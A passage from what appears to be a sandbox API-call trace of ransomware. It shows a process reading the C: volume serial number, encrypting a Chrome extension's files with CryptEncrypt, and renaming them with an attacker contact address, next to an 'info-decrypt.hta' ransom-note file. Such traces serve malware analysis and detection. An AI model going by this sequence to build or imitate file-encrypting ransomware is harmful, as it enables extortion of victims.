This=0x66b46c4, pPrx=0x66b46dc, dwProperty=2, pdwValue=0x949e0a8 | out: pdwValue=0x949e0a8) returned 0x80004002 [0206.520] WbemLocator:IUnknown:Release (This=0x66b46c4) returned 0x3 [0206.520] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x2 [0206.520] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0206.520] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0206.520] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x949e5f8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e5f4 | out: ppvObject=0x949e5f4*=0x60334d4) returned 0x0 [0206.520] WbemLocator:IUnknown:AddRef (This=0x60334d4) returned 0x4 [0206.520] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x3 [0206.520] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x2 [0206.520] SysStringLen (param_1=0x0) returned 0x0 [0206.521] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x949e98c | out: puCount=0x949e98c*=0x0) returned 0x0 [0206.521] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x949e988*=0x0, pszText=0x0 | out: puBuffLength=0x949e988*=0x20, pszText=0x0) returned 0x0 [0206.521] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x949e988*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e988*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.521] CoGetContextToken (in: pToken=0x949e5f8 | out: pToken=0x949e5f8) returned 0x0 [0206.521] WbemLocator:IUnknown:AddRef (This=0x66b46dc) returned 0x3 [0206.521] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e48c | out: ppvObject=0x949e48c*=0x66b46dc) returned 0x0 [0206.521] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x3 [0206.521] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x2 [0206.521] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x949e990*=0x0, pszText=0x0 | out: puBuffLength=0x949e990*=0x20, pszText=0x0) returned 0x0 [0206.521] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x949e990*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e990*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.521] IWbemServices:GetObject (in: This=0x60334d4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e944*=0x0, ppCallResult=0x0 | out: ppObject=0x949e944*=0x6028b10, ppCallResult=0x0) returned 0x0 [0206.743] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x949e944 | out: puCount=0x949e944*=0x2) returned 0x0 [0206.743] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=4, puBuffLength=0x949e940*=0x0, pszText=0x0 | out: puBuffLength=0x949e940*=0xf, pszText=0x0) returned 0x0 [0206.743] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=4, puBuffLength=0x949e940*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e940*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.744] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e940*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3617b58*=0, plFlavor=0x3617b5c*=0 | out: pVal=0x949e940*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3617b58*=8, plFlavor=0x3617b5c*=0) returned 0x0 [0206.744] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.744] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.744] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e948*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3617b58*=8, plFlavor=0x3617b5c*=0 | out: pVal=0x949e948*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3617b58*=8, plFlavor=0x3617b5c*=0) returned 0x0 [0206.744] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.744] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.744] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", lpFilePart=0x0) returned 0x85 [0206.744] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xa8 [0206.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9a8) returned 1 [0206.745] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), fInfoLevelId=0x0, lpFileInformation=0x949ea24 | out: lpFileInformation=0x949ea24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x348707e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0206.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9a4) returned 1 [0206.745] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0206.746] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", nBufferLength=0x105, lpBuffer=0x949e560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", lpFilePart=0x0) returned 0x8b [0206.746] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", lpFilePart=0x0) returned 0x8e [0206.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9c8) returned 1 [0206.746] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ea44 | out: lpFileInformation=0x949ea44*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31f86dc0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x31f86dc0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x31f86dc0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0206.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9c4) returned 1 [0206.746] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", lpFilePart=0x0) returned 0x8b [0206.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea14) returned 1 [0206.747] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), fInfoLevelId=0x0, lpFileInformation=0x36185c0 | out: lpFileInformation=0x36185c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5)) returned 1 [0206.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea10) returned 1 [0206.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", nBufferLength=0x105, lpBuffer=0x949e454, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", lpFilePart=0x0) returned 0x8b [0206.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e948) returned 1 [0206.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.747] GetFileType (hFile=0x280) returned 0x1 [0206.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e944) returned 1 [0206.747] GetFileType (hFile=0x280) returned 0x1 [0206.748] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x949ea50 | out: lpFileSizeHigh=0x949ea50*=0x0) returned 0x2d5 [0206.748] ReadFile (in: hFile=0x280, lpBuffer=0x3798c40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e9fc, lpOverlapped=0x0 | out: lpBuffer=0x3798c40*, lpNumberOfBytesRead=0x949e9fc*=0x2d5, lpOverlapped=0x0) returned 1 [0206.781] CloseHandle (hObject=0x280) returned 1 [0206.781] CryptAcquireContextW (in: phProv=0x949e99c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e99c*=0xbe0b58) returned 1 [0206.782] CryptGenRandom (in: hProv=0xbe0b58, dwLen=0x10, pbBuffer=0x3799f94 | out: pbBuffer=0x3799f94) returned 1 [0207.363] CryptImportKey (in: hProv=0xbe0b58, pbData=0x3612160, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e96c | out: phKey=0x949e96c*=0xb7f510) returned 1 [0207.363] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.363] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.363] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e95c | out: phKey=0x949e95c*=0xb7f490) returned 1 [0207.363] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.363] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x4, pbData=0x3612240*=0x1, dwFlags=0x0) returned 1 [0207.363] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x1, pbData=0x361220c, dwFlags=0x0) returned 1 [0207.363] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3612250*, pdwDataLen=0x949e9c8*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x3612250*, pdwDataLen=0x949e9c8*=0x2e0) returned 1 [0207.363] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3612554*, pdwDataLen=0x949e9d0*=0x0, dwBufLen=0x10 | out: pbData=0x3612554*, pdwDataLen=0x949e9d0*=0x10) returned 1 [0207.365] CryptDestroyKey (hKey=0xb7f510) returned 1 [0207.365] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0207.365] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0207.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", nBufferLength=0x105, lpBuffer=0x949e440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", lpFilePart=0x0) returned 0x8b [0207.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e934) returned 1 [0207.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0207.366] GetFileType (hFile=0x32c) returned 0x1 [0207.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e930) returned 1 [0207.366] GetFileType (hFile=0x32c) returned 0x1 [0207.366] WriteFile (in: hFile=0x32c, lpBuffer=0x3612c04*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e9c4, lpOverlapped=0x0 | out: lpBuffer=0x3612c04*, lpNumberOfBytesWritten=0x949e9c4*=0x20, lpOverlapped=0x0) returned 1 [0207.367] CloseHandle (hObject=0x32c) returned 1 [0207.368] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0207.368] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0207.368] CoTaskMemFree (pv=0xbed438) [0207.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0207.368] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e970 | out: ppv=0x949e970*=0xb51e34) returned 0x0 [0207.368] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e968 | out: pAptType=0x949e968*=1) returned 0x0 [0207.369] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e96c | out: ppvObject=0x949e96c*=0x0) returned 0x80004002 [0207.369] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.370] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2d8 | out: ppv=0x949e2d8*=0x6027440) returned 0x0 [0207.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027440, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4f0 | out: ppvObject=0x949e4f0*=0x0) returned 0x80004002 [0207.370] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027440, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e504 | out: ppvObject=0x949e504*=0x6031120) returned 0x0 [0207.370] WbemDefPath:IUnknown:Release (This=0x6027440) returned 0x0 [0207.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e124 | out: ppvObject=0x949e124*=0x6031120) returned 0x0 [0207.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0e0 | out: ppvObject=0x949e0e0*=0x0) returned 0x80004002 [0207.370] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0207.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da3c | out: ppvObject=0x949da3c*=0x0) returned 0x80004002 [0207.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9ec | out: ppvObject=0x949d9ec*=0x0) returned 0x80004002 [0207.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9f8 | out: ppvObject=0x949d9f8*=0x66ccc28) returned 0x0 [0207.371] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949da00 | out: pCid=0x949da00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.371] WbemDefPath:IUnknown:Release (This=0x66ccc28) returned 0x3 [0207.371] CoGetContextToken (in: pToken=0x949da58 | out: pToken=0x949da58) returned 0x0 [0207.371] CoGetContextToken (in: pToken=0x949da08 | out: pToken=0x949da08) returned 0x0 [0207.371] CoGetContextToken (in: pToken=0x949de60 | out: pToken=0x949de60) returned 0x0 [0207.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949def0 | out: ppvObject=0x949def0*=0x0) returned 0x80004002 [0207.371] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0207.371] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0207.371] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0207.371] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0207.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x949e818*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x6031120) returned 0x0 [0207.371] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0207.371] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0207.371] WbemDefPath:IWbemPath:SetText (This=0x6031120, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0207.371] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e998*=0x0, pszText=0x0 | out: puBuffLength=0x949e998*=0x20, pszText=0x0) returned 0x0 [0207.371] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e998*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e998*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.371] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0207.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0207.372] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0207.372] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0207.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x949e91c | out: puCount=0x949e91c*=0x0) returned 0x0 [0207.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e908 | out: puCount=0x949e908*=0x2) returned 0x0 [0207.372] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0x0, pszText=0x0 | out: puBuffLength=0x949e904*=0xf, pszText=0x0) returned 0x0 [0207.372] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e904*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.372] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8b8 | out: ppv=0x949e8b8*=0xb51e34) returned 0x0 [0207.372] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8b0 | out: pAptType=0x949e8b0*=1) returned 0x0 [0207.372] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x0) returned 0x80004002 [0207.372] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.373] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e220 | out: ppv=0x949e220*=0x60271a0) returned 0x0 [0207.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e438 | out: ppvObject=0x949e438*=0x0) returned 0x80004002 [0207.373] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271a0, pUnkOuter=0x0, 